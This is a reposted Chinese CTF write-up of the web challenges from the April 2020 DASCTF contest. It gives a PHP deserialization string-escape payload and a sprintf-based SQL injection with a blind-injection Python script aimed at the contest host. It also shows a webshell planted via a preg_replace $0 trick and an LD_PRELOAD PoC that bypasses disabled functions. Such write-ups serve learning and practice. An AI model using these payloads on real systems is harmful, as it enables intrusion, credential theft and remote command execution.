安恒月赛2020年DASCTF——四月春季赛---Web-Writeup

2024-01-23 21:32

本文主要是介绍安恒月赛2020年DASCTF——四月春季赛---Web-Writeup,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Ezunserialize

比赛的时候去玩了,刚好兄弟们发了第一个web的源码,于是我自己复现了一下

<?php
show_source("index.php");
error_reporting(0);
function write($data){return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}function read($data){return str_replace('\0\0\0', chr(0) . '*' . chr(0) , $data);
}class A{public $username;public $password;function __construct($a,$b){$this->username = $a;$this->password = $b;}
}class B{public $b ='gqy';function __destruct(){$c = 'a'.$this->b;echo $c;}
}class C{public $c;function __toString(){//flag.phpecho file_get_contents($this->c);return 'nice';}
}$a = new A($_GET['a'],$_GET['b']);$b = unserialize(read(write(serialize($a))));
?>

看源码明显的反序列化漏洞,接着我们构造pop链
在这里插入图片描述
这两个类,__destruct和__toString魔术方法怎么自动调用就不详说了,之前的文章已经详细说明了。

pop链构造思路如下
题目已提示flag.php,所以我们要让C类的属性c=flag.php,从而通过file_get_content()输出flag,但是要输出flag,得先自动调用_toString魔术方法,所以我们让B类的属性b等于C类,从而输出一个类,就自动调用_toString魔术方法了
exp如下

<?phpclass B{public $b;
}class C{public $c = "flag.php";
}$a = new B();
$a->b = new C();echo serialize($a);?>

序列化的内容如下

O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}

如果我们直接将上面这段内容传进去的话
在这里插入图片描述
可以发现对象被当成password的一个值了(也就是字符窜),所以不能够调用魔术方法

接着再看到源码
在这里插入图片描述
反序列化之前还需经过read,write两个函数
在这里插入图片描述
很明显的思路了,反序列化字符逃逸
但是不知道他的字符窜长度的变化
我自己做了个小测试
发现输入\0\0\0之后
在这里插入图片描述
长度变成6了,说明\0\0\0的长度是6,而chr(0) . '*' . chr(0)的长度则是3
说明经过read()后字符窜长度多了3
所以我们得让s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}插进去,
让原本的password变成username里的内容,从而得到flag

";s:8:"password";s:85:"

**这一段的长度是23,而经过函数变化后,会比原来的字符窜多3,所以得让上面的长度为3的倍数,于是在后面加个a",长度变为24,同时闭合双引号

从而原来的password被username吞进去,但是后面我们得闭合最后面的双引号,因为对象之前是被当做字符窜的**

payload如下

?a=\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&b=a";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}};s:0:"";s:0"

在这里插入图片描述

可以看到序列化后的内容,********";s:8:"password";s:85:"a这一段内容长度刚好是48,从而实现字符窜逃逸
查看源代码
在这里插入图片描述
成功调用pop链

babytricks

没想到赛后环境又出来了,真的舒服
在这里插入图片描述
随便提交发现有一段sql语句

 select * from user where user='$user' and passwd='%s'

和我们平常见到的sql语句不同,搜了搜
sprintf格式化注入漏洞
我看那篇文章大概就是 没做字符类型检测的最大危害就是它可以吃掉一个转义符, 如果%后面出现一个,那么php会把\当作一个格式化字符的类型而吃掉, 最后%\(或%1$\)被替换为空

为了更方便理解,我自己做了个测试
在这里插入图片描述
可以发现%1$将单引号给吞了,从而实现类似于’转义单引号的注入,前面经过测试,过滤了or 我们可以用异或来进行sql注入

payload

user=%1$&passwd=^1^1#

观察界面,很明显有布尔回显
我采用的是布尔盲注
查用户名payload

user=%1$&passwd=^(ascii(substr((user),1,1))>1)#

查密码payload

user=%1$&passwd=^(ascii(substr((passwd),1,1))>1)#

exp如下

import requests
import timeurl = "http://183.129.189.60:10010/"
temp = {}
password = ""
for i in range(1,1000):time.sleep(0.06)low = 32high =128mid = (low+high)//2while(low<high):'''查用户名'''payload1 ='^(ascii(substr((user),%d,1))>%d)#' % (i,mid)temp = {"user": "%1$", "passwd": payload1}'''查密码'''# payload2 = '^(ascii(substr((passwd),%d,1))>%d)#' % (i,mid)# temp={"user":"%1$","passwd": payload2}r = requests.post(url,data=temp)print(low,high,mid,":")if "username or password error" in r.text:low = mid+1else:high = midmid =(low+high)//2if(mid ==32 or mid ==127):breakpassword +=chr(mid)print(password)print("password=",password)

用户名 admin
在这里插入图片描述

密码 GoODLUcKcTFer202OHAckFuN
在这里插入图片描述
我登录之后是这个玩意
在这里插入图片描述
,想了想会不会是后台登录
我用御剑扫到了admin后台

登录之后

一段源码

<?php
error_reporting(0);
session_save_path('session');
session_start();
require_once './init.php';
if($_SESSION['login']!=1){die("<script>window.location.href='./index.php'</script>");
}
if($_GET['shell']){$shell= addslashes($_GET['shell']);$file = file_get_contents('./shell.php');$file = preg_replace("/\\\$shell = '.*';/s", "\$shell = '{$shell}';", $file);file_put_contents('./shell.php', $file);
}else{echo "set your shell"."<br>";chdir("/");highlight_file(dirname(__FILE__)."/admin.php");
}
?>

参考文献

利用$0将单引号吞掉,从而将webshell传入
我自己测试了一下

http://localhost:9090/update.php?api=;phpinfo();
http://localhost:9090/update.php?api=$0

在这里插入图片描述
可以发现咱们的webshell并没有被替代
传马

payload

?shell=;eval($_POST[penson]);
?shell=$0

蚁剑连接

在这里插入图片描述

好家伙,访问根目录失败,我就知道没这么容易…
看了web
绕过LD_PRELOAD
深入浅出LD_PRELOAD & putenv():
exp链接

先去看看phpinfo
在这里插入图片描述
禁用了mail,再去看看phpinfo,看到有个gnupg库,可以利用这一点,来进行绕过

参考文献
根据参考文献,上传我们的文件
poc文件如下:(将上面的链接改下(反正抄赵总的…)

<?phpecho "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>";$cmd = $_GET["cmd"];$out_path = $_GET["outpath"];$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";putenv("EVIL_CMDLINE=" . $evil_cmdline);$so_path = $_GET["sopath"];putenv("LD_PRELOAD=" . $so_path);$res = gnupg_init();gnupg_seterrormode($res, GNUPG_ERROR_WARNING);$info = gnupg_keyinfo($res,'your-key-id');echo "Key-Info<pre>";var_dump($info);echo "</pre>";echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>"; unlink($out_path);
?>

上传后就可以getshell了

查看根目录文件
在这里插入图片描述
查看flag即可

这篇关于安恒月赛2020年DASCTF——四月春季赛---Web-Writeup的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/637594

相关文章

Spring常见错误之Web嵌套对象校验失效解决办法

《Spring常见错误之Web嵌套对象校验失效解决办法》:本文主要介绍Spring常见错误之Web嵌套对象校验失效解决的相关资料,通过在Phone对象上添加@Valid注解,问题得以解决,需要的朋... 目录问题复现案例解析问题修正总结  问题复现当开发一个学籍管理系统时,我们会提供了一个 API 接口去

使用IntelliJ IDEA创建简单的Java Web项目完整步骤

《使用IntelliJIDEA创建简单的JavaWeb项目完整步骤》:本文主要介绍如何使用IntelliJIDEA创建一个简单的JavaWeb项目,实现登录、注册和查看用户列表功能,使用Se... 目录前置准备项目功能实现步骤1. 创建项目2. 配置 Tomcat3. 项目文件结构4. 创建数据库和表5.

手把手教你idea中创建一个javaweb(webapp)项目详细图文教程

《手把手教你idea中创建一个javaweb(webapp)项目详细图文教程》:本文主要介绍如何使用IntelliJIDEA创建一个Maven项目,并配置Tomcat服务器进行运行,过程包括创建... 1.启动idea2.创建项目模板点击项目-新建项目-选择maven,显示如下页面输入项目名称,选择

usaco 1.3 Mixing Milk (结构体排序 qsort) and hdu 2020(sort)

到了这题学会了结构体排序 于是回去修改了 1.2 milking cows 的算法~ 结构体排序核心: 1.结构体定义 struct Milk{int price;int milks;}milk[5000]; 2.自定义的比较函数,若返回值为正,qsort 函数判定a>b ;为负,a<b;为0,a==b; int milkcmp(const void *va,c

Java Web指的是什么

Java Web指的是使用Java技术进行Web开发的一种方式。Java在Web开发领域有着广泛的应用,主要通过Java EE(Enterprise Edition)平台来实现。  主要特点和技术包括: 1. Servlets和JSP:     Servlets 是Java编写的服务器端程序,用于处理客户端请求和生成动态网页内容。     JSP(JavaServer Pages)

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

EasyPlayer.js网页H5 Web js播放器能力合集

最近遇到一个需求,要求做一款播放器,发现能力上跟EasyPlayer.js基本一致,满足要求: 需求 功性能 分类 需求描述 功能 预览 分屏模式 单分屏(单屏/全屏) 多分屏(2*2) 多分屏(3*3) 多分屏(4*4) 播放控制 播放(单个或全部) 暂停(暂停时展示最后一帧画面) 停止(单个或全部) 声音控制(开关/音量调节) 主辅码流切换 辅助功能 屏

9.8javaweb项目总结

1.主界面用户信息显示 登录成功后,将用户信息存储在记录在 localStorage中,然后进入界面之前通过js来渲染主界面 存储用户信息 将用户信息渲染在主界面上,并且头像设置跳转,到个人资料界面 这里数据库中还没有设置相关信息 2.模糊查找 检测输入框是否有变更,有的话调用方法,进行查找 发送检测请求,然后接收的时候设置最多显示四个类似的搜索结果

JavaWeb【day09】--(Mybatis)

1. Mybatis基础操作 学习完mybatis入门后,我们继续学习mybatis基础操作。 1.1 需求 需求说明: 根据资料中提供的《tlias智能学习辅助系统》页面原型及需求,完成员工管理的需求开发。 通过分析以上的页面原型和需求,我们确定了功能列表: 查询 根据主键ID查询 条件查询 新增 更新 删除 根据主键ID删除 根据主键ID批量删除

利用Django框架快速构建Web应用:从零到上线

随着互联网的发展,Web应用的需求日益增长,而Django作为一个高级的Python Web框架,以其强大的功能和灵活的架构,成为了众多开发者的选择。本文将指导你如何从零开始使用Django框架构建一个简单的Web应用,并将其部署到线上,让世界看到你的作品。 Django简介 Django是由Adrian Holovaty和Simon Willison于2005年开发的一个开源框架,旨在简